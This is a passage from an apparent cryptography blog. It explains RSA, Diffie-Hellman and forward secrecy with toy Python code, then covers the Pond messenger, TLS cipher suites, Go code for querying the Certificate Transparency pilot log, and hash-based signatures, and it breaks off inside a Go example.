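    bob_public = public_key(bob_private)
    print("public keys:", alice_public, bob_public)
    print("Alice's view:", shared_secret(bob_public, alice_private))
    print("Bob's view:  ", shared_secret(alice_public, bob_private))
    print("attacker recovers:", brute_force_private(alice_public))
```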

This was a huge breakthrough but it still left something to be desired: signatures. It seemed that it would be very useful for Alice to be able to calculate some function of a message that could be broadcast and would serve as a signature. So it had to be something that only Alice (or, rather, the entity holding the private part of Alice's public key) could have generated. Diffie-Hellman doesn't provide this.

In 1977, three researchers at MIT, Rivest, Shamir and Adleman, produced such a scheme. Now it's called by their initials: RSA. Again, the basics are high-school math.

We'll be working with modular arithmetic again but this time it'll be modulo the product of two primes. Like the example above, the numbers involved are usually huge, but we're going to use tiny numbers for the purposes of the examples.

So our two primes will be p=11 and q=17. This will serve as Alice's RSA private key. In order to calculate an RSA public key, one calculates n=11×17=187.

The core of RSA is that, when working modulo 187, it's very easy to calculate the cube of a number. But, unless you know that 187=11×17, it's very difficult to calculate the cube root of a number. Let's say that our message is 15. The cube is easy: 15^3 = 3375 = 9 mod 187. But to calculate the cube root you need to calculate the modular inverse of 3 modulo (p-1)(q-1) = 10×16 = 160. We're getting a little past high-school math here so trust me that it's 107 (you can check that 3×107 = 321 = 1 mod 160). By calculating 9^107 mod 187 we find that we get our original number again: 15.

Think about what this means. If Bob knows that Alice's public key is 187, he can cube a message and send it to Alice and only Alice can calculate the cube root and recover the message. Also, if Alice starts with a message, she can calculate the cube root of it and publish that. Everyone else can be convinced that only Alice could have calculated the cube root of the message and so that functions as a digital signature of the message!
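Again, the toy numbers can be checked with a short Python sketch. The function names are mine, and this is "textbook" RSA with no padding or hashing, so it only illustrates the arithmetic and is not how RSA should be used in practice. (The three-argument pow with an exponent of -1 computes a modular inverse and needs Python 3.8 or later.)

```python
P, Q = 11, 17                          # Alice's private primes
N = P * Q                              # public modulus, 187
E = 3                                  # public exponent: cubing
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent: cube roots


def encrypt(message: int) -> int:
    """Anyone can cube a message modulo N."""
    return pow(message, E, N)


def decrypt(ciphertext: int) -> int:
    """Only the holder of D can take the cube root."""
    return pow(ciphertext, D, N)


def sign(message: int) -> int:
    """A signature is the cube root of the message."""
    return pow(message, D, N)


def verify(message: int, signature: int) -> bool:
    """Anyone can cube the signature and compare it with the message."""
    return pow(signature, E, N) == message


if __name__ == "__main__":
    print("D =", D)
    print("encrypt(15) =", encrypt(15))
    print("decrypt(9)  =", decrypt(9))
    print("signature verifies:", verify(15, sign(15)))
```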

Now we have everything that we need to understand forward security so hang on while we wrap it all up.

RSA and Diffie-Hellman are both too slow to use for large amounts of data. Bulk data transfer uses secret-key cryptography: the old style cryptography where both sides need to know the secret key in order to process the ciphertext. But, in order to get the secret key to the other party, RSA or Diffie-Hellman is used.

Traditional HTTPS has the browser use RSA to transmit a secret key to the server. The browser picks a random, secret key, cubes it modulo the server's RSA modulus and sends it to the server. Only the server knows the two numbers that, multiplied together, equal its modulus so only the server can calculate the cube root and get the secret key for the connection.

However, if anyone were to record the HTTPS connection and later learn those two numbers (called factors) then they can retrospectively decrypt the recorded connections. They can also watch new connections to the server and decrypt those because they can calculate cube roots just as well as the real server can.

With forward security, the method of establishing the secret key for the connection is changed. When a client connects, the server generates a brand new Diffie-Hellman private key just for that connection. (It's called the ephemeral private key.) Then the server calculates its Diffie-Hellman public key (by 2^a mod m, remember?), signs the public key with its RSA key (by calculating the cube root of it, modulo its RSA modulus) and sends all that to the browser. The browser verifies the signature (by cubing it and checking that the result equals the public key) and then generates its own Diffie-Hellman private and public keys. Now, the client has the server's Diffie-Hellman public key, so it can combine it with its Diffie-Hellman private key and calculate the shared secret. It sends its Diffie-Hellman public key to the server and the server ends up with the same, shared secret. That secret is used as the secret key for the connection.
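Putting the two toys together gives a sketch of the whole exchange. This is purely illustrative: it reuses the tiny numbers from the examples above (modulus 11, base 2, RSA modulus 187 with exponents 3 and 107), the function names are mine, and a real handshake signs far more than the bare public key.

```python
import secrets

DH_MODULUS, DH_BASE = 11, 2
RSA_N, RSA_E, RSA_D = 187, 3, 107   # server's long-term RSA key (toy values)


def ephemeral_keypair():
    """Fresh Diffie-Hellman private key (1..9) and matching public key."""
    private = 1 + secrets.randbelow(9)
    return private, pow(DH_BASE, private, DH_MODULUS)


def handshake():
    """Run one toy handshake; returns (client's secret, server's secret)."""
    # Server: new ephemeral key for this connection, signed with RSA.
    server_private, server_public = ephemeral_keypair()
    signature = pow(server_public, RSA_D, RSA_N)       # the "cube root"

    # Client: cube the signature and compare it with the public key.
    if pow(signature, RSA_E, RSA_N) != server_public:
        raise ValueError("signature check failed")
    client_private, client_public = ephemeral_keypair()
    client_secret = pow(server_public, client_private, DH_MODULUS)

    # Server: combine the client's public key with its ephemeral private key.
    server_secret = pow(client_public, server_private, DH_MODULUS)

    # Both ephemeral private keys go out of scope here and are forgotten.
    return client_secret, server_secret


if __name__ == "__main__":
    print(handshake())
```

Note that the RSA key is only ever used to sign; nothing encrypted under it crosses the wire, which is why learning it later doesn't help with recorded traffic.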

The advantage here is that, should the server's, long-term, RSA private key be compromised in the future it isn't as bad. The confidentiality of the connections is protected by the Diffie-Hellman secrets which were generated fresh for the connection and destroyed immediately afterwards. Also, the attacker, even with the RSA private key cannot passively decrypt connections in real-time. The attacker has to impersonate the server, which is much more work.

That's why forward-secrecy is often written as DHE: it stands for Diffie-Hellman ephemeral. There's also ECDHE (Elliptic Curve, Diffie-Hellman ephemeral) which is the same idea in a more efficient mathematical structure.

Pond

It seems that secure messaging projects are all the rage right now. Heck, Matthew Green is writing about it in the New Yorker this week!

One of my side-projects for a year or so has been about secure messaging. Of course, that means that I was working on it before it was cool (insert hipster emoticon here, :{D ) … but I'm slow because my side projects get very little time. (When I started, the subheading for the project was “How to better organise a discreet relationship with the Director of the CIA”, because that was the topical reference at the time. Oh, how things change.)

It's still not really ready, but the one year mark seemed like a good deadline to give myself to mention it in public. You should pay heed to the warning on the project page however. I did contact one, well known, security auditing company to see whether they would take a couple thousand dollars to spend a day on it, but they said that they don't really do small projects and that I'd need to be talking 10-20 times that for a couple of weeks at least. So don't depend on it yet and don't be surprised if I've just broken it somehow by replacing the ratchet code. (Although, thanks, Trevor, for the design.)

But I fear that it's not going to make Matthew Green happy! It's certainly not a drop-in replacement for email. I spend my days working on small changes with a large multiplier; in my free time I choose to shift the balance completely the other way.

  • Ephemeral messages: although no software can prevent a recipient from making a copy of a message, it's the social norm and technical default in Pond that messages are erased after a week.
  • No spam: only approved contacts can send you messages. In order for the server to enforce that without revealing the identity of every sender, pairing-based, group signatures are used. (The flip side is that there are no public addresses, so you can't message someone that you don't already know.)
  • Forward security: the exchange of messages drives a Diffie-Hellman ratchet preventing a point-in-time compromise from giving the attacker the ability to decrypt past messages (modulo the week-long retention).
  • Erasure storage: since B-tree filesystems like btrfs and log-structured SSDs mean that one can have very little confidence in being able to securely erase anything, Pond tries to use the TPM NVRAM to securely delete old state. (Note: not implemented for OS X yet.)
  • One-to-one only: No messages to multiple contacts (yet). Haven't implemented it.

The source code is in Go, but there are binaries for several Linux flavors and OS X. (Although it looks terrible on OS X and one user reports that the program can only be closed by killing it from the command line: I've not reproduced that yet.) In addition to the default server, I learned recently that the Wau Holland Foundation also runs a Pond server.

For more details, see the user guide, threat model etc which are linked from the project page.

If you get it running, but don't know anyone else, you can use:

gpg --recv-key C92172384F387DBAED4D420165EB9636F02C5704

to get my public key and email me a shared-secret. (Although I only check that email during the evenings.)

Please update F5/BIG-IP firmware

Update (Dec 7th): an F5 engineer commented on the TLS WG mailing list describing the internals of the hang bug. Based on this, we realised that it would be possible to work around the issue by padding ClientHello messages of a certain size. We now have a design for doing this, it's implemented in Chrome and it appears to be working! So, while you should always keep software up to date, it appears that the Internet can dodge this bug!

If you use F5/BIG-IP devices to terminate SSL connections, please update the firmware on the things! We're trying to run an Internet here and old versions of these devices are a real problem for deploying new TLS features. You need to be running at least version 10.2.4 (as far as I know), but running the latest version is generally good advice.

If you just try to connect to these sites with a recent version of OpenSSL, you should find that the connection hangs - which is terrible. We can detect a server that returns an error, but hanging the connection isn't something we can generally work around.

$ openssl version
OpenSSL 1.0.1e 11 Feb 2013
$ openssl s_client -connect stubhub.com:443
CONNECTED(00000003)
hangs!
$ openssl s_client -connect stubhub.com:443 -tls1
New, TLSv1/SSLv3, Cipher is AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
...

I did have a long list of major sites that were affected by this issue here. I've removed it because some of them had updated and, because of the update at the top, it's no longer a crippling problem.

ChaCha20 and Poly1305 for TLS

Today, TLS connections predominantly use one of two families of cipher suites: RC4 based or AES-CBC based. However, in recent years both of these families of cipher suites have suffered major problems. TLS's CBC construction was the subject of the BEAST attack (fixed with 1/n-1 record splitting or TLS 1.1) and Lucky13 (fixed with complex implementation tricks). RC4 was found to have key-stream biases that cannot effectively be fixed.

Although AES-CBC is currently believed to be secure when correctly implemented, a correct implementation is so complex that there remains strong motivation to replace it.

Clearly we need something better. An obvious alternative is AES-GCM (AES-GCM is AES in counter mode with a polynomial authenticator over GF(2^128)), which is already specified for TLS and has some implementations. Support for it is in the latest versions of OpenSSL and it has been the top preference cipher of Google servers for some time now. Chrome support should be coming in Chrome 31, which is expected in November. (Although we're still fighting to get TLS 1.2 support deployed in Chrome 30 due to buggy servers.)

AES-GCM isn't perfect, however. Firstly, implementing AES and GHASH (the authenticator part of GCM) in software in a way which is fast, secure and has good key agility is very difficult. Both primitives are suited to hardware implementations and good software implementations are worthy of conference papers. The fact that a naive implementation (which is also what's recommended in the standard for GHASH!) leaks timing information is a problem.

AES-GCM also isn't very quick on lower-powered devices such as phones, and phones are now a very important class of device. A standard phone (which is always defined by whatever I happen to have in my pocket; a Galaxy Nexus at the moment) can do AES-128-GCM at only 25MB/s and AES-256-GCM at 20MB/s (both measured with an 8KB block size).

Lastly, if we left things as they are, AES-GCM would be the only good cipher suite in TLS. While there are specifications for AES-CCM and for fixing the AES-CBC construction, they are all AES based and, in the past, having some diversity in cipher suites has proven useful. So we would be looking for an alternative even if AES-GCM were perfect.

In light of this, Google servers and Chrome will soon be supporting cipher suites based around ChaCha20 and Poly1305. These are primitives developed by Dan Bernstein and are fast, secure, have high quality, public domain implementations, are naturally constant time and have nearly perfect key agility.

On the same phone as the AES-GCM speeds were measured, the ChaCha20+Poly1305 cipher suite runs at 92MB/s (which should be compared against the AES-256-GCM speed as ChaCha20 is a 256-bit cipher).

In addition to support in Chrome and on Google's servers, my colleague, Elie Bursztein, and I are working on patches for NSS and OpenSSL to support this cipher suite. (And I should thank Dan Bernstein, Andrew M, Ted Krovetz and Peter Schwabe for their excellent, public domain implementations of these algorithms. Also Ben Laurie and Wan-Teh Chang for code reviews, suggestions etc.)

But while AES-GCM's hardware orientation is troublesome for software implementations, it's obviously good news for hardware implementations and some systems do have hardware AES-GCM support. Most notably, Intel chips have had such support (which they call AES-NI) since Westmere. Where such support exists, it would be a shame not to use it because it's constant time and very fast (see slide 17). So, once ChaCha20+Poly1305 is running, I hope to have clients change their cipher suite preferences depending on the hardware that they're running on, so that, in cases where both client and server support AES-GCM in hardware, it'll be used.

To wrap all this up, we need to solve a long standing, browser TLS problem: in order to deal with buggy HTTPS servers on the Internet (of which there are many, sadly), browsers will retry failed HTTPS connections with lower TLS version numbers in order to try and find a version that doesn't trigger the problem. As a last attempt, they'll try an SSLv3 connection with no extensions.

Several useful features get jettisoned when this occurs but the important one for security, up until now, has been that elliptic curve support is disabled in SSLv3. For servers that support ECDHE but not DHE that means that a network attacker can trigger version downgrades and remove forward security from a connection. Now that AES-GCM and ChaCha20+Poly1305 are important we have to worry about them too as these cipher suites are only defined for TLS 1.2.

Something needs to be done to fix this so, with Chrome 31, Chrome will no longer downgrade to SSLv3 for Google servers. In this experiment, Google servers are being used as an example of non-buggy servers. The experiment hopes to show that networks are sufficiently transparent that they'll let at least TLS 1.0 through. We know from Chrome's statistics that connections to Google servers do end up getting downgraded to SSLv3 sometimes, but all sorts of random network events can trigger a downgrade. The fear is that there's some common network element that blocks TLS connections by deep-packet inspection, which we'll measure by breaking them and seeing how many bug reports we get.

If that works then, in Chrome 32, no fallbacks will be permitted for Google servers at all. This stage of the experiment tests that the network is transparent to TLS 1.2 by, again, breaking anything that isn't and seeing if it causes bug reports.

If both those experiments work then, great! We can define a way for servers to securely indicate that they don't need version fallback. It would be nice to have used the renegotiation extension for this, but I think that there are likely already too many broken servers that support that, so another SCSV is probably needed.

If we get all of the above working then we're not in too bad a state with respect to TLS cipher suites. At least, once most of the world has upgraded in any case.

Playing with the Certificate Transparency pilot log

I've written about Certificate Transparency several times in the past, but now there's actually something to play with! (And, to be clear, this is entirely thanks to several of my colleagues, not me!) So I thought it would be neat to step through some simple requests of the pilot log.

I'm going to be using Go for this, because I like it. But it's substantially just JSON and HTTP and one could do it in any language.

In order to query a log you need to know its URL prefix and public key. Here's a structure to represent that.

// Log represents a public log.
type Log struct {
	Root string
	Key *ecdsa.PublicKey
}

For the pilot log, the URL prefix is https://ct.googleapis.com/pilot and here's the public key:

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEfahLEimAoz2t01p3uMziiLOl/fHT
DM0YDOhBRuiBARsV4UvxG2LdNgoIGLrtCzWE0J5APC2em4JlvR8EEEFMoA==
-----END PUBLIC KEY-----

Since it's a little obscure, here's the code to parse a public key like that. (This code, and much of the code below, is missing error checking because I'm just playing around.)

	block, _ := pem.Decode([]byte(pilotKeyPEM))
	key, _ := x509.ParsePKIXPublicKey(block.Bytes)
	pilotKey = key.(*ecdsa.PublicKey)
	pilotLog = &Log{Root: "https://ct.googleapis.com/pilot", Key: pilotKey}
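
For anything beyond playing around, the same parsing can be done without discarding the errors. This is a minimal sketch: parseLogKey is a hypothetical helper name (not something from the toy code), and the key is the pilot key quoted above.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/x509"
	"encoding/pem"
	"errors"
	"fmt"
)

// pilotKeyPEM is the pilot log's public key as quoted above.
const pilotKeyPEM = `-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEfahLEimAoz2t01p3uMziiLOl/fHT
DM0YDOhBRuiBARsV4UvxG2LdNgoIGLrtCzWE0J5APC2em4JlvR8EEEFMoA==
-----END PUBLIC KEY-----`

// parseLogKey (a hypothetical helper) decodes a PEM-encoded ECDSA public
// key and reports each failure instead of ignoring it.
func parseLogKey(pemText string) (*ecdsa.PublicKey, error) {
	block, _ := pem.Decode([]byte(pemText))
	if block == nil {
		return nil, errors.New("ct: no PEM block found")
	}
	key, err := x509.ParsePKIXPublicKey(block.Bytes)
	if err != nil {
		return nil, err
	}
	ecKey, ok := key.(*ecdsa.PublicKey)
	if !ok {
		return nil, errors.New("ct: not an ECDSA public key")
	}
	return ecKey, nil
}

func main() {
	key, err := parseLogKey(pilotKeyPEM)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println("curve:", key.Curve.Params().Name)
}
```

The checked type assertion matters most: a bare key.(*ecdsa.PublicKey) panics if the PEM happens to hold, say, an RSA key.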

The log is a tree, so the first thing that we want to do with a log is to get its head. This is detailed in section 4.3 of the RFC: we make an HTTP GET to get-sth and it returns a JSON blob.

Any HTTP client can do that, so give it a go with curl on the command line:

$ curl https://ct.googleapis.com/pilot/ct/v1/get-sth 2>>/dev/null | less

You should get a JSON blob that, with a bit of formatting, looks like this:

{
	"tree_size": 1979426,
	"timestamp": 1368891548960,
	"sha256_root_hash": "8UkrV2kjoLcZ5fP0xxVtpsSsWAnvcV8aPv39vh96J2o=",
	"tree_head_signature": "BAMARjBEAiAc95/ONhz2vQsULrISlLumvpo..."
}

In Go, we'll parse that into a structure like this:

// Head contains a signed tree head.
type Head struct {
	Size uint64 `json:"tree_size"`
	Time time.Time `json:"-"`
	Hash []byte `json:"sha256_root_hash"`
	Signature []byte `json:"tree_head_signature"`
	Timestamp uint64 `json:"timestamp"`
}

And here's some code to make the HTTP request, check the signature and return such a structure:

func (log *Log) GetHead() (*Head, error) {
	// See https://tools.ietf.org/html/rfc6962#section-4.3
	resp, err := http.Get(log.Root + "/ct/v1/get-sth")
	if err != nil {
		return nil, err
	}

	defer resp.Body.Close()
	if resp.StatusCode != 200 {
		return nil, errors.New("ct: error from server")
	}
	if resp.ContentLength == 0 {
		return nil, errors.New("ct: body unexpectedly missing")
	}
	if resp.ContentLength > 1<<16 {
		return nil, errors.New("ct: body too large")
	}
	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return nil, err
	}
	
	head := new(Head)
	if err := json.Unmarshal(data, head); err != nil {
		return nil, err
	}

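	// The timestamp is in milliseconds, but time.Unix wants seconds and
	// nanoseconds, so the remainder has to be scaled up.
	head.Time = time.Unix(int64(head.Timestamp/1000), int64(head.Timestamp%1000)*int64(time.Millisecond))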

	// See https://tools.ietf.org/html/rfc5246#section-4.7
	if len(head.Signature) < 4 {
		return nil, errors.New("ct: signature truncated")
	}
	if head.Signature[0] != hashSHA256 {
		return nil, errors.New("ct: unknown hash function")
	}
	if head.Signature[1] != sigECDSA {
		return nil, errors.New("ct: unknown signature algorithm")
	}

	signatureBytes := head.Signature[4:]
	var sig struct {
		R, S *big.Int
	}

	if signatureBytes, err = asn1.Unmarshal(signatureBytes, &sig); err != nil {
		return nil, errors.New("ct: failed to parse signature: " + err.Error())
	}
	if len(signatureBytes) > 0 {
		return nil, errors.New("ct: trailing garbage after signature")
	}
	
	// See https://tools.ietf.org/html/rfc6962#section-3.5
	signed := make([]byte, 2 + 8 + 8 + 32)
	x := signed
	x[0] = logVersion
	x[1] = treeHash
	x = x[2:]
	binary.BigEndian.PutUint64(x, head.Timestamp)
	x = x[8:]
	binary.BigEndian.PutUint64(x, head.Size)
	x = x[8:]
	copy(x, head.Hash)

	h := sha256.New()
	h.Write(signed)
	digest := h.Sum(nil)

	if !ecdsa.Verify(log.Key, digest, sig.R, sig.S) {
		return nil, errors.New("ct: signature verification failed")
	}

	return head, nil
}

If one runs this code against the current pilot, we can get the same information as we got with curl: 1979426 certificates at Sat May 18 11:39:08 EDT 2013, although now the date will be newer and there will be more entries.
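
The parsing half of this can be checked offline against the sample blob from earlier. The sketch below is an illustration rather than part of the toy code: sthFields and decodeSTH are made-up names, and the signature field is left out because the example above truncates it. Note that time.Unix takes seconds and nanoseconds, so the millisecond remainder is scaled.

```go
package main

import (
	"encoding/json"
	"fmt"
	"time"
)

// sampleSTH holds the fields of the example response above, minus the
// (truncated) signature.
const sampleSTH = `{
	"tree_size": 1979426,
	"timestamp": 1368891548960,
	"sha256_root_hash": "8UkrV2kjoLcZ5fP0xxVtpsSsWAnvcV8aPv39vh96J2o="
}`

// sthFields mirrors the Head structure without the signature.
type sthFields struct {
	Size      uint64 `json:"tree_size"`
	Timestamp uint64 `json:"timestamp"`
	Hash      []byte `json:"sha256_root_hash"` // base64 in JSON
}

// decodeSTH (hypothetical) parses the JSON and converts the millisecond
// timestamp into a time.Time in UTC.
func decodeSTH(data []byte) (sthFields, time.Time, error) {
	var f sthFields
	if err := json.Unmarshal(data, &f); err != nil {
		return f, time.Time{}, err
	}
	secs := int64(f.Timestamp / 1000)
	nanos := int64(f.Timestamp%1000) * int64(time.Millisecond)
	return f, time.Unix(secs, nanos).UTC(), nil
}

func main() {
	f, when, err := decodeSTH([]byte(sampleSTH))
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(f.Size, "certificates at", when, "with a", len(f.Hash), "byte root hash")
}
```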

As you can see, the log has been seeded with some certificates gathered from a scan of the public Internet. Since this data is probably more recent than the EFF's Observatory data, it might be of interest and anyone can download it using the documented interface. Again, we can try a dummy request in curl:

$ curl 'https://ct.googleapis.com/pilot/ct/v1/get-entries?start=0&end=0' 2>>/dev/null | less

You should see a result that starts with {"entries":[{"leaf_input":"AAAAAAE9p. You can request log entries in batches and even download everything if you wish. My toy code simply writes a single large file containing the certificates, gzipped and concatenated with a length prefix.
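
To get at the certificate inside a leaf_input, one has to peel off the MerkleTreeLeaf framing from section 3.4 of the RFC. The following is a rough sketch that assumes the entry is a plain X.509 entry (not a precertificate) and ignores the trailing extensions; parseLeaf and buildLeaf are hypothetical names, and buildLeaf exists only to make a synthetic leaf for the demonstration. The AAAAAAE9 prefix seen above fits this layout: a zero version, a zero leaf type and the top bytes of a 2013 timestamp in milliseconds.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// parseLeaf (hypothetical) decodes a base64 leaf_input that holds an X.509
// entry and returns its timestamp and the DER certificate bytes.
func parseLeaf(leafInput string) (timestamp uint64, cert []byte, err error) {
	leaf, err := base64.StdEncoding.DecodeString(leafInput)
	if err != nil {
		return 0, nil, err
	}
	// version (1) + leaf type (1) + timestamp (8) + entry type (2) + length (3)
	if len(leaf) < 15 {
		return 0, nil, errors.New("ct: leaf truncated")
	}
	if leaf[0] != 0 || leaf[1] != 0 {
		return 0, nil, errors.New("ct: unknown version or leaf type")
	}
	timestamp = binary.BigEndian.Uint64(leaf[2:10])
	if entryType := binary.BigEndian.Uint16(leaf[10:12]); entryType != 0 {
		return 0, nil, errors.New("ct: not an X.509 entry")
	}
	certLen := int(leaf[12])<<16 | int(leaf[13])<<8 | int(leaf[14])
	rest := leaf[15:]
	if len(rest) < certLen {
		return 0, nil, errors.New("ct: certificate truncated")
	}
	return timestamp, rest[:certLen], nil
}

// buildLeaf makes a synthetic leaf_input for testing; the "certificate" can
// be any bytes.
func buildLeaf(timestamp uint64, cert []byte) string {
	leaf := make([]byte, 15, 15+len(cert)+2)
	binary.BigEndian.PutUint64(leaf[2:10], timestamp)
	leaf[12] = byte(len(cert) >> 16)
	leaf[13] = byte(len(cert) >> 8)
	leaf[14] = byte(len(cert))
	leaf = append(leaf, cert...)
	leaf = append(leaf, 0, 0) // empty extensions
	return base64.StdEncoding.EncodeToString(leaf)
}

func main() {
	ts, cert, err := parseLeaf(buildLeaf(1368891548960, []byte("not really a certificate")))
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(ts, len(cert))
}
```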

My toy code is go gettable from https://github.com/agl/certificatetransparency. In the tools directory is ct-sync, which will incrementally download the pilot log and ct-map, which demonstrates how to look for interesting things by extracting the certificates from a local mirror file. Both will use multiple cores if possible so be sure to set GOMAXPROCS. (This is very helpful when calculating the hash of the tree since the code doesn't do that incrementally.)
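
For reference, the tree hash itself is short to write down. This is a sketch of the Merkle Tree Hash from section 2.1 of the RFC, written from the specification rather than copied from ct-sync: leaves are hashed with a 0x00 prefix, interior nodes with a 0x01 prefix, and the split point is the largest power of two strictly less than the number of leaves. Like the toy code, it is not incremental and it is single-threaded.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// merkleRoot computes the RFC 6962 Merkle Tree Hash of the given leaves.
func merkleRoot(leaves [][]byte) [32]byte {
	switch n := len(leaves); n {
	case 0:
		// The hash of an empty tree is the hash of the empty string.
		return sha256.Sum256(nil)
	case 1:
		return sha256.Sum256(append([]byte{0x00}, leaves[0]...))
	default:
		// Split at the largest power of two strictly less than n.
		k := 1
		for k*2 < n {
			k *= 2
		}
		left := merkleRoot(leaves[:k])
		right := merkleRoot(leaves[k:])
		node := append([]byte{0x01}, left[:]...)
		node = append(node, right[:]...)
		return sha256.Sum256(node)
	}
}

// merkleRootHex is a convenience wrapper for printing.
func merkleRootHex(leaves [][]byte) string {
	root := merkleRoot(leaves)
	return hex.EncodeToString(root[:])
}

func main() {
	leaves := [][]byte{[]byte("one"), []byte("two"), []byte("three")}
	fmt.Println(merkleRootHex(leaves))
}
```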

The project's official code is at https://code.google.com/p/certificate-transparency/. See the README and the main site.

And since we have the tools to look for interesting things, I spent a couple of minutes doing so:

I wrote a quick script to find ‘TURKTRUST’ certificates - leaf certificates that are CA certificates. The log only contains certificates that are valid by a fairly promiscuous root set in order to prevent spam, so we don't have to worry about self-signed certificates giving us false positives. As ever, the Korean Government CA is a good place to find malpractice, with 40 certificates that mistakenly have the CA bit set (and are currently valid). This issue was reported by a colleague of mine last year. Thankfully, the issuing certificate has a path length constraint that should prevent this issue from being exploited (as long as your X.509 validation checks these sorts of details). The root CA is also only present in the Microsoft root set as far as I know.

A different Korean root CA (KISA) can't encode ASN.1 correctly and is issuing certificates with negative serial numbers because ASN.1 INTEGERs are negative if the most significant bit is one.
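
The encoding mistake is easy to demonstrate with Go's encoding/asn1. A small sketch (decodeInteger is just a helper name for this example): the value 128 needs a leading zero byte in DER, because a lone 0x80 has its top bit set and therefore decodes as -128.

```go
package main

import (
	"encoding/asn1"
	"errors"
	"fmt"
)

// decodeInteger parses a single DER-encoded INTEGER.
func decodeInteger(der []byte) (int, error) {
	var n int
	rest, err := asn1.Unmarshal(der, &n)
	if err != nil {
		return 0, err
	}
	if len(rest) != 0 {
		return 0, errors.New("trailing data after INTEGER")
	}
	return n, nil
}

func main() {
	// Tag 0x02 (INTEGER), length 1, contents 0x80: the top bit is set, so
	// this is a negative number.
	wrong, _ := decodeInteger([]byte{0x02, 0x01, 0x80})
	// With a leading zero byte the same low byte is positive.
	right, _ := decodeInteger([]byte{0x02, 0x02, 0x00, 0x80})
	fmt.Println(wrong, right)
}
```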

Another CA is issuing certificates with 8-byte IP addresses (I've let them know).

The ct-map.go in the repository is set up to find publicly valid certificates with names that end in .corp (which will soon not get an HTTPS indication in Chrome).

Anyway, at the moment the log is just pre-seeded with some public certificates. The real value of CT comes when we have strong assurances that all valid certificates are in the log. That will take some time, but we're working towards it.

Hash based signatures

It's likely that Kevin Poulsen will still be alive in twenty years' time, and that his encrypted message to Edward Snowden will still be saved somewhere. In fact, there are several places where people post RSA-encrypted messages and seem to assume that they're secure. Even assuming that no huge advances in factoring occur (and Joux et al have just killed discrete logs in binary fields, so it's not impossible), large, quantum computers will be able to break them.

It might be the case that building practical, quantum computers doesn't turn out to be possible (D-Wave machines don't count here), but there are people trying hard to do it. From “Deep State” (a rather fragmented book, but interesting in parts):

There is a quantum computing arms race of sorts under way. China, Israel and Russia have advanced quantum computing programs with direct aim of gaining geopolitical advantage, as does DARPA itself.

There are classified and semi-classified DARPA and Army/Air Force/Navy Research Lab programs for the potential use of quantum computers for a select set of defense technologies, including: the ability to design a perfect sensing laser for drones or satellites; the ability to design radar that can defeat counter-stealth techniques; the ability to design coatings for aircraft that truly are stealth, owning to the exploitation of quantum fluid dynamics.

Now, government agencies don't care about Wired, but they do care about those things. So it's a possibility that, in a few decades, an academic lab will be in possession of a large quantum computer and might want to pursue some light-hearted historical investigations. (Just in case, I've included the Wired message and key below in case either is deleted ☺)

Despite a common misunderstanding, quantum computers don't break all public key cryptography, and quantum cryptography isn't the answer. (Unless you have lots of money and a dedicated fiber line, and possibly not even then.) Instead post-quantum cryptography is the answer, and there's even a conference on it.

So, should we be using post-quantum algorithms now? The reason that we don't currently use them is because they generally take one or two orders of magnitude more time, space or both. For high-volume work like TLS, that puts them outside the bounds of practicality. But for an application like PGP, where the volume of messages is very low, why not? Size might be an issue but, if it takes 1 second to process a message vs 10 milliseconds, it doesn't really make a difference. You might as well dial the security up to 11.

There are a couple of things that one needs for a system like PGP: encryption and signatures. One option for building post-quantum, public-key signatures is hash-based signatures. These are actually really old! They were described by Lamport in 1979, only a couple of years after RSA. In fact, as Rompel showed, a secure signature scheme exists if and only if a secure hash-based signature scheme exists. Individual hash functions may be broken, but if hash-based signatures are broken in general then there can be no secure signatures at all!

The most primitive hash-based signature can be used only once, and only to sign a single-bit message: Alice picks two random values, x and y and publishes her public key: H(x) and H(y). In order to sign a message, Alice publishes one of the two, original values depending on the value of the bit.

Clearly this only works for a single bit message. It's also a one-time signature because once one of the original values has been published, it's insecure for the same public key to be used again.

The first extension to this scheme is to run many instances in parallel in order to sign larger messages. Fix the hash function, H, as SHA-256. Now Alice picks 512 random values, x_0..x_255 and y_0..y_255, and publishes the hash of each of them as her public key. Now she can sign an arbitrarily long message, m, by calculating H(m) and then, for each i, publishing either x_i or y_i depending on bit i of H(m).

It's still one-time though. As soon as Alice signs a different message with the same public key then, for some values of i, both x_i and y_i have been published. This lets an attacker forge signatures for messages that Alice hasn't signed.
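
The 256-way parallel scheme fits in a few lines of Go. This is only a sketch to make the description concrete: the type and function names are made up for the example, the choice of which bit of H(m) selects which pair is arbitrary (most significant bit first here), and nothing stops a caller from signing twice with the same key, which, as noted, breaks it.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

const bits = 256

// privateKey holds the x values in [0] and the y values in [1]; publicKey
// holds their hashes in the same positions.
type privateKey [2][bits][32]byte
type publicKey [2][bits][32]byte

func generate() (*privateKey, *publicKey, error) {
	priv, pub := new(privateKey), new(publicKey)
	for b := 0; b < 2; b++ {
		for i := 0; i < bits; i++ {
			if _, err := rand.Read(priv[b][i][:]); err != nil {
				return nil, nil, err
			}
			pub[b][i] = sha256.Sum256(priv[b][i][:])
		}
	}
	return priv, pub, nil
}

// bit returns bit i of the digest, most significant bit first.
func bit(digest [32]byte, i int) int {
	return int(digest[i/8]>>(7-uint(i%8))) & 1
}

// sign reveals one preimage per bit of H(msg). A key must only ever be
// used for a single message.
func sign(priv *privateKey, msg []byte) [bits][32]byte {
	digest := sha256.Sum256(msg)
	var sig [bits][32]byte
	for i := range sig {
		sig[i] = priv[bit(digest, i)][i]
	}
	return sig
}

// verify hashes each revealed value and compares it with the public key
// entry selected by the corresponding bit of H(msg).
func verify(pub *publicKey, msg []byte, sig [bits][32]byte) bool {
	digest := sha256.Sum256(msg)
	for i := range sig {
		if sha256.Sum256(sig[i][:]) != pub[bit(digest, i)][i] {
			return false
		}
	}
	return true
}

func main() {
	priv, pub, err := generate()
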